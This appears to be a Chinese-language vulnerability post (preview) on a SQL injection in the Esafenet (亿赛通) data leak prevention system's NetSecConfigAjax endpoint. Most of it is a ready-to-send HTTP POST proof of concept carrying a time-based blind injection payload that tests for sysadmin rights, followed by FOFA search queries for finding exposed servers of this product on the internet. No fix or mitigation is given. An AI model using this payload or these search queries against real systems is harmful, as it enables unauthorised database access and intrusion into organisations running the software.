文章预览
影响范围 亿赛通数据泄露防护(DLP)系统 漏洞概述 亿赛通数据泄露防护(DLP)系统NetSecConfigAjax SQL注入漏洞 漏洞复现 应用界面如下所示: 漏洞POC如下所示: POST /CDGServer3/NetSecConfigAjax;Service HTTP/1.1 Host : x.x.x.x Upgrade-Insecure-Requests : 1 User-Agent : Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36 Accept : text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Accept-Encoding : gzip, deflate Accept-Language : zh-CN,zh;q=0.9 Connection : close Content-Type : application/x-www-form-urlencoded Content-Length : 106 command=updateNetSec & state = 123 '%3bif+(select+IS_SRVROLEMEMBER(' sysadmin '))%3d1+WAITFOR+DELAY+' 0 %3a0%3a6 '-- 资产测绘 FOFA语法: body= "CDGServer3" || title= "电子文档安全管理系统" || cert= "esafenet" || body= "/help/getEditionInfo.jsp" ||
………………………………